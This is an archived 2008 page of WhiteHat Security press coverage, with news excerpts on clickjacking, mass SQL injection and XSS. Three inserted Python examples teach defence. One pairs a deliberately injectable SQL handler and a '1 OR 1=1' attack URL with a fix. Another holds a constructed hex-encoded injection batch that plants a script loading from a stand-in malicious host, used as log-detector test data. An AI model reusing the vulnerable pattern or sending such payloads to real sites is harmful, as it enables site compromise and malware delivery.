Website Security News :: 2008 WhiteHat Security Coverage
December 2008 | Permalink
At the forefront of computer security at the network, desktop and code levels are the security researchers who blend hacking, software programming and intelligent detective work to decode and thwart online criminal behavior. Whether it’s tracking the latest Windows malware, bots, rootkits, attack scripts, distributed denial of service (DDoS), Trojan horses or other Internet and application security flaws, these researchers are at the forefront of protecting data, financial information and identities in an increasingly open online world. They face an uphill battle as the numbers for data breaches and identity theft climb every year. Yet they push on. Here are 10 security researchers who deserve our praise and thanks. Check out the Security Slideshow Online at Baseline ›››
Recent Site Compromises Highlight Arrival of Web Application Security
By Steve Ragan -
December 29, 2008 | Permalink
Everyone from IBM to the IC3 agrees in their 2008 security trend reports: the Web as you know it was the single largest avenue of attack in 2008. More than a million Web pages were compromised, leading to the spread of malware, loss of personal information, and reputational damage for some businesses.
“It’s unanimous. Web application security is the [number one] avenue of attack according to basically every industry data security report available,” wrote Jeremiah Grossman, Chief Technology Officer of WhiteHat Security, in a recent blog post. Read article online at The Tech Herald ›››
Adobe Hopes to Speed Patch Releases with More Transparency
By Robert Westervelt, News Editor
Dec 17, 2008 | SearchSecurity.com | Permalink
The Adobe Secure Software Engineering Team (ASSET) is trying to improve visibility in its software development processes to get security researchers to report flaw findings directly to the vendor.
Some vulnerabilities are reported by security researchers to Adobe after first being reported to Mozilla, Microsoft and other software vendors. It often slows the time it takes to roll out a patch, said Brad Arkin, Adobe's director of product security and privacy. Read article online at SearchSecurity.com ›››
Application Security: The Turning Point?
Are we there yet? Editor in Chief Derek Slater wants to say yes, but an OWASP expert says no.
By Derek Slater
November 14, 2008 | Permalink
I wanted very much to write a column about how we've reached a turning point regarding application security.
It wasn't that I thought one particular cataclysmic event has changed our course for the better. Rather, it was an accumulation of smaller observations and developments: Read article online at CSO ›››
Good Question: How Can I Bank Online Safely?
By Jordan Robertson
November 11, 2008 | Permalink
Q: I hear so much about hackers attacking Web sites and stealing people's personal information. Is it safe to bank online?
A: One of the scariest things about banking online is that you're forced to enter personal information, like account numbers, that you'd never type anywhere else on the Internet. You're also viewing your most sensitive financial information, and the fear is if you can see it, a skillful hacker might as well.
Getting over that hurdle takes faith in the security of your computer and the banking Web site, but the most paranoid people in the world — computer security experts — say it's absolutely fine to bank online. As long as you guard against the person who is likely your biggest adversary: yourself. Read article online at the Associated Press ›››
Stephanie Fohn, CEO, WhiteHat Security, Named as a Finalist for Best Executive – Non-Services Businesses
October 2008 | Permalink
Stevie Awards were created to honor and generate public recognition of the achievements and positive contributions of organizations and business people worldwide. Beginning with The American Business Awards in 2002, The International Business Awards in 2003, The Stevie Awards for Women in Business in 2004, and the Stevie Awards for Sales & Customer Service in 2006, our mission is to raise the profile of exemplary organizations and individuals among the press, the business community, and the general public. In short order the Stevie has become one of the world's most coveted awards.
The Stevie Awards for Women in Business are governed by a Board of Distinguished Judges & Advisors that features many leading figures in business.
All women entrepreneurs and executives worldwide are eligible to participate in the awards.
Stevie Award winners will be announced at the November 14 awards dinner in New York.
Read more about the awards ›››
Clickjacking Attack Lets Web Sites See, Hear You
Thomas Claburn
October 8, 2008 | Permalink
The technique can be used to hijack a computer's Webcam and microphone to create a malicious surveillance platform.
Details about the cross-platform browser exploitation technique known as "clickjacking" have started to emerge. Among the more alarming ways it can be used: covertly watching and listening to people who have microphones and Webcams attached to their computers.
"Web pages know what Web sites you've been to ..., where you're logged in, what you watch on YouTube, and now they can literally 'see' and 'hear' you," warned Jeremiah Grossman, founder and CTO of WhiteHat Security, in a blog post...Read article online at InformationWeek ›››
Clickjacking Exploits Enable Hackers to Hijack Webcams
Angela Moscaritolo
October 8, 2008 | Permalink
A hacker could potentially see and hear you by hijacking your webcam and microphone using clickjacking exploits and Adobe Flash, security researchers said this week.
“The bad news is with clickjacking, any computer with a microphone and/or a web camera attached can be invisibly coaxed into being a remote surveillance device,” Jeremiah Grossman, founder and chief technology officer of WhiteHat Security, wrote on his blog Tuesday...Read article online at SC Magazine ›››
Security Researchers Warn of New 'clickjacking' Browser Bugs
By Gregg Keizer
September 26, 2008 | Permalink
Internet Explorer, Firefox, Safari, Opera, Chrome, others vulnerable to new class of attacks
Security researchers warned today that a new class of vulnerabilities dubbed "clickjacking" puts users of every major browser at risk from attack.
Details of the multiple flaws -- six different types, by one count -- are sketchy, because the researchers, who presented some of their findings at a security conference earlier this week, have purposefully kept their information confidential as at least one vendor works on a fix...Read article online at ComputerWorld ›››
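The clickjacking items above describe the attack but not the check a site owner needs. Below is an added example (not code from any of the articles or from WhiteHat) that decides from a page's response headers whether another origin can frame it, using the two controls browsers honour today: X-Frame-Options, which shipped with IE8 in 2009, after these articles, and the CSP frame-ancestors directive, which takes precedence over X-Frame-Options when both are present. In 2008 the only option was JavaScript frame-busting, which a hostile top page can often suppress, so this is the modern answer to the 2008 problem. The header sets and the bank/partner/attacker hostnames are constructed for the example.

```python
"""Clickjacking exposure check from HTTP response headers.

Added example, not code from the articles above or from WhiteHat. The framing
rules are the ones current browsers apply: X-Frame-Options (IE8, 2009) and the
CSP frame-ancestors directive, which overrides X-Frame-Options when both are
present. All header sets and hostnames below are constructed.
"""
from urllib.parse import urlsplit

DEFAULT_PORT = {"http": 80, "https": 443}


def origin_of(url):
    """(scheme, host, port) for a URL, filling in the scheme's default port."""
    p = urlsplit(url)
    scheme = p.scheme.lower()
    return scheme, (p.hostname or "").lower(), p.port or DEFAULT_PORT.get(scheme, 0)


def frame_ancestors(csp_value):
    """Source list of the frame-ancestors directive, or None if absent."""
    for directive in csp_value.split(";"):
        tokens = directive.split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            return [t.lower() for t in tokens[1:]]   # empty list behaves like 'none'
    return None


def source_matches(source, page, framer):
    """Match one frame-ancestors source expression against the framer origin.

    Handles 'none', 'self', '*', scheme sources ("https:") and host sources with
    optional scheme, port and leading wildcard label. Enough for an audit script,
    not the full CSP source-expression grammar.
    """
    if source == "'none'":
        return False
    if source == "'self'":
        return framer == page
    if source == "*":
        return True
    if source.endswith(":") and "/" not in source:          # scheme source
        return framer[0] == source[:-1]
    scheme, sep, rest = source.partition("://")
    if not sep:                                            # host source inherits page scheme
        scheme, rest = page[0], source
    host, _, port = rest.partition(":")
    if scheme != framer[0] and not (scheme == "http" and framer[0] == "https"):
        return False
    if host.startswith("*."):
        if not framer[1].endswith(host[1:]):
            return False
    elif host != framer[1]:
        return False
    if port == "*":
        return True
    wanted = int(port) if port else DEFAULT_PORT.get(scheme, 0)
    return wanted == framer[2]


def framing_allowed(headers, page_url, framer_url):
    """True if a current browser would render page_url inside a frame on framer_url.

    True for an origin you do not trust means the page is clickjackable.
    """
    h = {k.lower(): v for k, v in headers.items()}
    page, framer = origin_of(page_url), origin_of(framer_url)
    sources = frame_ancestors(h.get("content-security-policy", ""))
    if sources is not None:                                # CSP wins over X-Frame-Options
        return any(source_matches(s, page, framer) for s in sources)
    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return framer == page
    return True   # absent or unsupported (e.g. ALLOW-FROM): no protection


def audit(page_url, header_sets, attacker_url="https://attacker.invalid"):
    """Map each named header set to whether attacker_url could frame the page."""
    return {name: framing_allowed(hdrs, page_url, attacker_url)
            for name, hdrs in header_sets.items()}


# Constructed header sets for a hypothetical online-banking page.
SAMPLE_HEADERS = {
    "no-protection": {"Content-Type": "text/html"},
    "xfo-deny": {"X-Frame-Options": "DENY"},
    "xfo-sameorigin": {"X-Frame-Options": "SAMEORIGIN"},
    "xfo-allow-from": {"X-Frame-Options": "ALLOW-FROM https://partner.invalid"},
    "csp-none": {"Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'"},
    "csp-overrides-xfo": {"X-Frame-Options": "DENY",
                          "Content-Security-Policy": "frame-ancestors 'self' https://*.partner.invalid"},
}

if __name__ == "__main__":
    for name, clickjackable in audit("https://bank.invalid/transfer", SAMPLE_HEADERS).items():
        print(f"{name:20s} framable by attacker: {clickjackable}")
```

Run it directly to print a verdict per header set. A result of True for an origin you do not trust means the page can be overlaid with invisible frames in the way the articles describe. ALLOW-FROM is treated as no protection because current browsers ignore it; use frame-ancestors to allow a specific partner origin.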
Dan Kaplan
September 26, 2008 | Permalink
When hobbyist Dan Thompson created a website in 2000 for music fans to discuss and trade lyrics of one-hit wonders – think “Come on Eileen” or “Ice, Ice Baby” – he never thought the site would become a cyber target.
But that's just what happened last month, when hackers launched injection attacks against the vulnerable site by inserting a simple, customised script into the URL string. This query manipulated the contents of the Structured Query Language (SQL) Server database – common on most dynamic websites – causing the comment sections below message board threads to disappear...Read article online at SC Magazine ›››
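The lyric-site story above is the classic case: a value taken from the URL is pasted into a SQL statement, so the attacker's input is parsed as SQL. The following added example (not the site's code, and not from the article) shows a comment-hiding handler written that way beside the parameterised version, on an in-memory SQLite database with a constructed schema, rows and URLs. SQL Server would also accept stacked statements after a semicolon; sqlite3's execute() refuses them, so the attack here widens the WHERE clause with a tautology, which is enough to make every comment on the board disappear.

```python
"""String-built UPDATE beside its parameterised fix, using sqlite3.

Added example, not code from the article or the site it describes. The
message-board schema, rows and URLs are constructed. SQL Server also allows
stacked statements ("...; DELETE FROM ..."), which sqlite3's execute() refuses,
so the attack shown widens a WHERE clause with 1=1 instead; the root cause,
untrusted input concatenated into the query, is the same.
"""
import sqlite3
from urllib.parse import parse_qs, urlsplit

SCHEMA = """
CREATE TABLE comments (
    id     INTEGER PRIMARY KEY,
    thread INTEGER NOT NULL,
    body   TEXT    NOT NULL,
    hidden INTEGER NOT NULL DEFAULT 0
);
INSERT INTO comments (thread, body) VALUES
    (1, 'Come On Eileen still holds up'),
    (1, 'Anyone have the Ice Ice Baby bridge?'),
    (2, 'Best one-hit wonder of 1987?');
"""


def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def comment_id_from(url):
    """The raw ?id= value exactly as a 2008-era handler would read it."""
    return parse_qs(urlsplit(url).query)["id"][0]


def hide_comment_vulnerable(conn, url):
    """Moderator action built by string concatenation: the value is parsed as SQL."""
    sql = "UPDATE comments SET hidden = 1 WHERE id = " + comment_id_from(url)
    conn.execute(sql)
    conn.commit()
    return sql   # returned so the caller can see what actually ran


def hide_comment_safe(conn, url):
    """Same action with type validation and a bound parameter."""
    raw = comment_id_from(url)
    if not raw.isdigit():
        raise ValueError(f"id must be a positive integer, got {raw!r}")
    conn.execute("UPDATE comments SET hidden = 1 WHERE id = ?", (int(raw),))
    conn.commit()


def visible_comments(conn, thread):
    rows = conn.execute(
        "SELECT body FROM comments WHERE thread = ? AND hidden = 0 ORDER BY id",
        (thread,),
    )
    return [body for (body,) in rows]


# Constructed requests: the attacker's id value is "1 OR 1=1", URL-encoded.
ATTACK_URL = "http://lyrics.invalid/hide?id=1%20OR%201%3D1"
NORMAL_URL = "http://lyrics.invalid/hide?id=1"


def demo():
    """Run both handlers against the same attack and report what is left visible."""
    results = {}
    conn = fresh_db()
    hide_comment_vulnerable(conn, ATTACK_URL)
    results["vulnerable"] = (visible_comments(conn, 1), visible_comments(conn, 2))
    conn = fresh_db()
    try:
        hide_comment_safe(conn, ATTACK_URL)
        results["safe"] = "attack accepted"
    except ValueError:
        results["safe"] = (visible_comments(conn, 1), visible_comments(conn, 2))
    return results


if __name__ == "__main__":
    for handler, state in demo().items():
        print(handler, "->", state)
```

The safe handler validates the type before binding. Binding alone would stop the injection, since a bound parameter is never parsed as SQL, but rejecting non-numeric ids early also gives you a log entry for the attempt.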
Security Researchers and Vendors – a Truce?
By Elinor Mills
September 18, 2008 | Permalink
There has historically been a clash between security researchers who find security flaws in software products and the companies that make those products.
But two recent examples of cooperation between researchers and vendors show hope for future truces.
Leading by example was Dan Kaminsky, director of penetration testing for IOActive, who warned security software vendors about a fatal flaw in the DNS (Domain Name System) months before going public so vendors could release patches...Read Article Online at CNET ›››
Hacker gets into Palin's Yahoo E-mail Account
By Lisa Demer (ldemer@adn.com)
September 18, 2008 | Permalink
Cyber agents look into possible 'computer intrusion' crime.
A hacker broke into the Yahoo e-mail account that vice presidential candidate Sarah Palin uses for official business as Alaska's governor as well as for personal communications.
The intrusion, which apparently began early Tuesday morning, alarmed the McCain-Palin campaign, though Internet security experts and Palin critics weren't surprised that her Yahoo account on the Web was vulnerable... Read Article Online at The Anchorage Daily News ›››
In-Depth Analysis Finds More Severe Web Flaws
By Kelly Jackson Higgins
Senior Editor, Dark Reading
June 10, 2008 | Permalink
New Web Application Security Consortium (WASC) report suggests automated scanning alone isn't as thorough when it comes to serious bugs
A new report on Web threats released today by the Web Application Security Consortium says that in-depth manual and automated assessments found nearly 97 percent of sites carry a severe vulnerability... Read Article online at Dark Reading ›››
Friendly Fire
Dan Kaplan
September 2008 | Permalink
Protecting users from internet-borne threats falls on trusted websites, says Overstock's Sam Peterson. Read Article online at SC Magazine ›››
Google's Chrome Walls
By Andy Greenberg
September 2, 2008 | Permalink
When Google swallowed the security company GreenBorder in May 2007, the tiny Mountain View, Calif.-based firm seemed to be yet another promising start-up that had disappeared into the Googleplex's catacombs, never to be heard from again.
But on Tuesday, when Google revealed its new browser, known as Chrome, it became clear how GreenBorder's engineers have been earning their free lunches for the last 15 months: devising a way to inoculate the search giant's new toy against the Web's epidemic of cybercrime... Read Article online at Forbes ›››
Business Logic Flaws Endanger Websites
Dan Kaplan
August 12, 2008 | Permalink
Never mind scanning your website for vulnerabilities in code to prevent attacks.
That may not be enough to protect from another high-risk business impediment: logic flaws. And the potential cost to victim sites could be in the millions.
Two researchers from WhiteHat Security, an application security firm, explained at the Black Hat conference in Las Vegas that business logic flaws often are overlooked by quality assurance teams. Meanwhile, their presence is only expected to grow in coming years... Read Article online at SC Magazine ›››
Eyeballing the Security of Application Service Providers
Jeremiah Grossman, Founder and CTO WhiteHat Security
July 02, 2008 | Permalink
Jeremiah Grossman, founder and Chief Technology Officer of WhiteHat Security, gives advice on vetting Application Service Providers to ensure security for your business
A large number of banks, credit unions, product merchants, healthcare providers, and others are taking advantage of Application Services Providers (ASPs) to enhance their on-line offerings and reduce IT cost. Popular ASPs offer attractive service packages that include the necessary hardware and software infrastructure, such as fast, reliable machines, large bandwidth pipes, disaster-recovery policies, several layers of built-in fault tolerance, and support...
Read Article online at CSO ›››
12 Ways to Visualize Network Security
By Network World Staff, Network World, 07/14/08 | Permalink
Security is like a stack of Swiss cheese. Each slice covers up holes in the slices below it.
By Jeremiah Grossman, CTO, WhiteHat Security
Traditional enterprise security is viewed as a hard outer shell protecting a soft interior, but today's Web 2.0 era has changed all that. The perimeter has become porous with applications and access control shared deep between enterprises and consumers. In this way enterprise security can be best viewed like a stack of Swiss cheese. No single layer of security is impenetrable; each protects certain areas and misses others. In a layered approach each slice (defense-in-depth) attempts to cover up the holes in the one below it...Read Article Online at Network World ›››
Industry View: Web Application Security Today - Are We All Insane?
Jeremiah Grossman, Founder and CTO WhiteHat Security
July 02, 2008 | Permalink
WhiteHat Security's Jeremiah Grossman believes the current approach to protecting Web apps is the very picture of insanity
Seventeen million programmers are churning out an estimated 102 billion new lines of code per year. Add 162 million websites online, with 809,000 using SSL (an indication of valuable data) and the problem becomes apparent. Researchers estimate that roughly one security defect exists per 10,000 lines of code and nine out of 10 websites contain one or more serious vulnerabilities. If only 1 percent of security defects are exploitable that means we are generating 102,000 zero-days per year - we just don't know where most of them are. Even if 90 percent of the SSL websites contained only a single issue, 728,100 website vulnerabilities are already in circulation, and we don't know where those are, either...Read Article Online at CSO ›››
SaaS Security Firm WhiteHat Lands $7m Series D Financing
Analyst: Paul Roberts
June 30, 2008 | Permalink
Event summary
- WhiteHat Security said on June 23 that it had raised $7m in series D financing from existing investors and new investor Horizon Ventures. The latest round brings total funding in WhiteHat to $13.2m.
- WhiteHat said it will use the money for sales, marketing and product development, and to improve its software-as-a-service (SaaS) infrastructure to meet customer demand.
- WhiteHat said it is seeing steep growth in demand from compliance-minded customers and notes that Requirement 6.6 of the Payment Card Industry Data Security Standard (PCI DSS) requires either application code review or a web application firewall in front of public-facing web applications.
Download the 451 Report ›››
Merchants Asked to Secure Their Sites
By Deborah Gage, Chronicle Staff Writer
June 30, 2008 | Permalink
Today is the deadline for any business that accepts credit cards over the Internet to meet new security standards for their Web sites.
But not all businesses are expected to make the deadline, and for those that do, it's not clear how much more secure their sites will be... Read article online at the San Francisco Chronicle ›››
Web Browsers Face Crisis of Security Confidence
By Dan Goodin in San Francisco
23 Jun 2008 21:56
June 26, 2008 | Permalink
User beware. Today's web browsers offer more security protections than ever, but according to security experts, they do little to protect people surfing the net from some of the web's oldest and most crippling threats...Read article online at Channel Register ›››
Major Security Vendors' Sites Could Be Launchpads for Phishing Attacks
By Tim Wilson, Site Editor, Dark Reading
June 10, 2008 | Permalink
McAfee, Symantec, and VeriSign sites all found to contain cross-site scripting flaws
With all the talk about hackers launching attacks from legitimate Websites, you'd think that the major security vendors' sites, at least, would be vulnerability-free...Read article online at Dark Reading ›››
Site Security Policy
By Steve Ragan
June 10, 2008 | Permalink
Brandon Sterne, Security Program Manager at Mozilla, recently published a proposal for a set of browser security features. The proposal, SSP or Site Security Policy, aims to give browsers a way to do more to protect users from XSS and CSRF threats. SSP is currently open for comments and is only available as an add-on for Firefox. Read article online at The Tech Herald ›››
The SaaS Approach to Web Site Vulnerability Management
By Stephanie Fohn
May 14, 2008 | Permalink
Software as a Service is the only solution for Web site vulnerability management, asserts Stephanie Fohn, chief executive officer of WhiteHat Security, because of its scalability and ease of implementation, among other reasons.
Securing Web applications is the No. 1 problem facing security professionals today. With 162 million Web sites in existence and millions more popping up each month, the sheer size of the problem is staggering -- not to mention the fact that nine out of 10 Web sites have serious vulnerabilities that can put critical customer data at risk. In fact, a new malware-infected Web site is discovered every 14 seconds. So, why aren't more companies solving this problem?
Read article at E-Commerce Times ›››
Few Expected to Make June 30 PCI Deadline for Web Application Security
By Jaikumar Vijayan
May 12, 2008 | Permalink
Many firms just now shaking off the mental cobwebs
May 12, 2008 (Computerworld) Retailers covered by the Payment Card Industry Data Security Standard (PCI-DSS) have just about a month and a half left to comply with new requirements for protecting Web applications. But as with previous PCI-related deadlines, this one appears destined to pass with a majority of merchants unlikely to be in full compliance. Read article at Computerworld ›››
Deconstructing PCI 6.6
Trey Ford
Director of Solutions Architecture, WhiteHat Security
May 12, 2008 | Permalink
Organizations handling credit cards feel pressure building as the deadline for PCI Requirement 6.6 compliance, June 30, 2008, approaches. Most are still evaluating how to strategically ensure compliance with this requirement, while maintaining a strong security posture...Read article at SCMagazine ›››
SQL Injection Attack Infects Hundreds of Thousands of Websites
By Michael S. Mimoso,
Editor, Information Security Magazine
April 28, 2008 | Permalink
Chinese hackers have conducted successful SQL injection attacks on hundreds of thousands of websites during the past 10 days, culling their targets from search engines.
Normally, SQL injection attacks are targeted attacks, one IP address at a time. The closest attack on this scale would be the SAMY worm attack on the MySpace.com domain, but that was against just one domain.
Read article at SearchSecurity.com ›››
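The mass attack above worked because the injected T-SQL batch was hex-encoded inside a CAST(0x... AS VARCHAR) and then URL-encoded, so it slipped past filters looking for plain keywords. The detector below is an added example (not from the article) that scans Apache-style access log lines, URL-decodes the request path up to twice, looks for the batch's indicators and decodes the hex blob so the analyst can see the statement that was actually sent. The log lines, IP addresses and the injected script URL are constructed, and the hex blob is generated from a constructed inner statement rather than copied from the real campaign.

```python
"""Flag the 2008 mass-SQL-injection pattern in web-server access logs.

Added example, not code from the article. The campaign it describes sent a
URL-encoded, hex-obfuscated T-SQL batch (DECLARE / CAST(0x...) / EXEC) through
ordinary query-string parameters of sites found via search engines. The log
lines and the injected script URL below are constructed; the hex blob is
generated from a constructed inner statement so the decoder can be checked.
"""
import re
from urllib.parse import quote, unquote_plus

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)
HEX_BLOB_RE = re.compile(r"cast\(\s*0x([0-9a-f]+)\s+as\s+n?varchar", re.I)
INDICATORS = ("declare @", "cast(0x", "exec(", "sp_executesql", "xp_cmdshell")


def normalise(path):
    """URL-decode up to twice (double encoding is a common filter bypass)."""
    text = path
    for _ in range(2):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text


def decode_hex_payload(text):
    """Recover the statement hidden in CAST(0x.. AS [N]VARCHAR); None if absent."""
    m = HEX_BLOB_RE.search(text)
    if not m:
        return None
    raw = bytes.fromhex(m.group(1))
    # NVARCHAR payloads are UTF-16LE and show up as interleaved NUL bytes.
    return raw.decode("utf-16-le") if b"\x00" in raw else raw.decode("latin-1")


def analyse_request(path):
    """Indicators found in one request path plus the decoded payload, or None."""
    text = normalise(path)
    hits = [i for i in INDICATORS if i in text.lower()]
    if not hits:
        return None
    return {"indicators": hits, "payload": decode_hex_payload(text)}


def scan_log(lines):
    """Findings for every log line whose request carries injection indicators."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        verdict = analyse_request(m["path"])
        if verdict:
            findings.append({"ip": m["ip"], "ts": m["ts"], "path": m["path"], **verdict})
    return findings


# --- constructed sample traffic (hex blob built from a constructed statement) ---
INNER_SQL = "UPDATE songs SET lyrics = lyrics + '<script src=http://malware.invalid/b.js></script>'"
BATCH = (f"DECLARE @S VARCHAR(4000);SET @S=CAST(0x{INNER_SQL.encode().hex()} "
         f"AS VARCHAR(4000));EXEC(@S);--")
SAMPLE_LOG = [
    '198.51.100.4 - - [28/Apr/2008:09:58:01 +0000] "GET /lyrics.asp?id=42 HTTP/1.1" 200 8831',
    f'203.0.113.7 - - [28/Apr/2008:10:14:22 +0000] "GET /lyrics.asp?id=42;{quote(BATCH)} HTTP/1.1" 200 8831',
    f'203.0.113.7 - - [28/Apr/2008:10:14:23 +0000] "GET /lyrics.asp?id=42;{quote(quote(BATCH))} HTTP/1.1" 200 8831',
    '198.51.100.9 - - [28/Apr/2008:10:20:40 +0000] "GET /search.asp?q=declare+of+independence HTTP/1.1" 200 1203',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["ts"], f["indicators"], "->", f["payload"])
```

Running it prints each flagged request with its decoded payload. Matching on normalised text rather than the raw path is what catches the double-encoded variant; the indicator list is a starting point for this campaign's shape, not a complete injection signature set.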
Google-Hacking Goes To China
By Andy Greenberg,
April 28, 2008 | Permalink
Google has yet to bring its U.S. success to China--only about one in five Chinese Web searches starts at the site. But lately, Google seems to have gained popularity with at least one group of Chinese Web users: some of the country's most successful cybercriminals...Read article at Forbes ›››
Web 2.0 Security Hangover
By Brian Prince
April 2008 | Permalink
The Web 2.0 party was a great time, but security pros and analysts are waking up to new problems.
Web 2.0 applications have certainly made the user experience more interactive, but organizations need to be mindful of their impact on Web site security.
Certainly, there are a number of reasons Web sites become an attractive target for hackers; sometimes sites are built prior to an attack being known about, or the developers were in a hurry. Still, some researchers say the Web 2.0 rush has had an impact on security as well, opening up new possibilities for attackers...Read article at eWeek ›››
The FutureNow List
April 2008 | Permalink
When The FutureNow List debuted a year ago IT security emerged as a spending priority, with the lion’s share of investment made in secure authentication. But as the first signs of the subprime crunch gave way to a crisis and yet another rogue trader got his 15 minutes of fame—this time it was Societe Generale’s Jerome Kerviel—information technology leaders were already turning their attention to risk management and compliance. Timing is everything: Prompted by recent events, politicians and regulators edge toward a sea-change in regulatory oversight...Read article at BTN ›››
Hackers Infiltrate Google Searches
By Phil Muncaster
April 2008 | Permalink
Hackers have turned their attention to search engines in the latest attempt to invade the computers of unsuspecting Web users.
In the past few weeks, they have taken advantage of Web pages that incorrectly use JavaScript, a computer language used in features like interactive maps, to infect thousands of sites. The altered sites show up in a Google search, and when clicked on, redirect the user to a malicious program that aims to steal information...Read article online at the San Francisco Chronicle ›››
Google Searchers Could End Up With a New Type of Bug
By Byron Acohido and Jon Swartz
March 31, 2008 | Permalink
Cybercrooks are manipulating the computer code used to put the pizazz in millions of websites in hopes of taking over unsuspecting consumers' PCs...Read article online at ABC News ›››
WhiteHat Seeks To Protect Top E-Commerce Sites
By Art Wittmann
March 10, 2008 | Permalink
WhiteHat CEO Stephanie Fohn says that you need her company's service if you've got a Web site that takes transactions. WhiteHat is a SaaS vendor that offers black-box penetration tests for Web sites... Read article and view video clip online at Information Week ›››
Phishing With SuperBait
February 2008 | Permalink
Security researchers have all the fun, like making up the pun-ny names for the new exploits they discover or detect. Case in point: “Phishing with superbait” is an increasing phenomenon in which cyber thieves take over an actual corporate Website using cross-site scripting, says WhiteHat Security founder and CTO Jeremiah Grossman. Cross-site scripting errors remain the most common vulnerability on financial services Websites, Grossman says...Read article online at Bank Technology News ›››
New Firefox Flaw Deemed Low-Risk Threat
By Dan Kaplan
January 24, 2008 | Permalink
Mozilla officials are investigating a new vulnerability in Firefox that could be exploited by attackers to steal files from a victim's machine...Read article online at SC Magazine ›››
The Lurking Perils of Online Transactions
By Jeremiah Grossman
January 22, 2008 | Permalink
E-commerce has been part of the retail world for more than a decade, and today's consumers seem to assume that because of this longevity, their transactions are secure. Beyond this, the average online shoppers are convinced their credit card numbers and other sensitive information are out of reach of attackers with a firewall and antivirus program, combined with shopping at brand-name retail sites...Read article online at Ecommerce Times ›››
Apple Fixes a Quartet of QuickTime Flaws
By Sean Michael Kerner
January 16, 2008 | Permalink
With all the hype surrounding Apple this week and its MacWorld event it's easy to forget that Apple is a company under a security siege. More specifically, Apple's QuickTime software has faced far more than its fair share of security woes over the past year. The software plays a critical role in Apple's ability to deliver multimedia content on its Mac and iTunes platforms...Read article online at internetnews.com ›››
WhiteHat Security CEO Named Recipient of Annual Tribute to Women (TWIN) Awards
January 8, 2008 | Permalink
WhiteHat Security, the leading provider of website vulnerability management services, today announced that the Silicon Valley YWCA has named the Company’s Chief Executive Officer, Stephanie Fohn, a winner of the 2007 TWIN Award...
Read article online at Forbes ›››
Widespread Flash File Flaws Allow Cross-Site Scripting Attacks
By Frank Washkuch Jr.
January 3, 2008 | Permalink
An attacker can carry out cross-site scripting (XSS) attacks on a vulnerable system through newly disclosed vulnerabilities in Shockwave Flash (SWF) files...
Read article online at SC Magazine ›››